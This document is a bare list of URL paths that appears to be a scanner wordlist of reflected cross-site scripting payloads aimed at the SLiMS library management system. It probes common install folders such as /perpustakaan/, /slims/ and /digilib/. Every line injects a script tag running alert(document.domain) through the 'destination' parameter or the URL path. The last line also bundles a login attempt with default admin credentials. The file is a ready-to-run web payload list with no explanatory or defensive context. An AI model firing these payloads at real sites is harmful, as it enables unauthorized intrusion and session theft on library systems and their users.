/index.php?destination=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&p=member
/perpustakaan/index.php?destination=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&p=member
/slims/index.php?destination=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&p=member
/perpustakaan/slims/index.php?destination=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&p=member
/e-library/index.php?destination=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&p=member
/perpus/index.php?destination=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&p=member
/digilib/index.php?destination=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&p=member
/akasia/index.php?destination=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&p=member
/library/index.php?destination=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&p=member
/index.php/%22--%3E<script>alert(document.domain)</script>/index.php
/perpustakaan/index.php/%22--%3E<script>alert(document.domain)</script>/index.php
/slims/index.php/%22--%3E<script>alert(document.domain)</script>/index.php
/perpustakaan/slims/index.php/%22--%3E<script>alert(document.domain)</script>/index.php
/e-library/index.php/%22--%3E<script>alert(document.domain)</script>/index.php
/perpus/index.php/%22--%3E<script>alert(document.domain)</script>/index.php
/digilib/index.php/%22--%3E<script>alert(document.domain)</script>/index.php
/bulian/index.php/%22--%3E<script>alert(document.domain)</script>/index.php
/library/index.php/%22--%3E<script>alert(document.domain)</script>/index.php
/index.php?_csrf_token_645a83a41868941e4692aa31e7235f2=6a50886006f02202a6dac5cfa07bcbfb1e2a6e84&destination=zbuip%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ejgoihbmmygljgoihbmmygl&logMeIn=Login&memberID=admin&memberPassWord=password&p=member
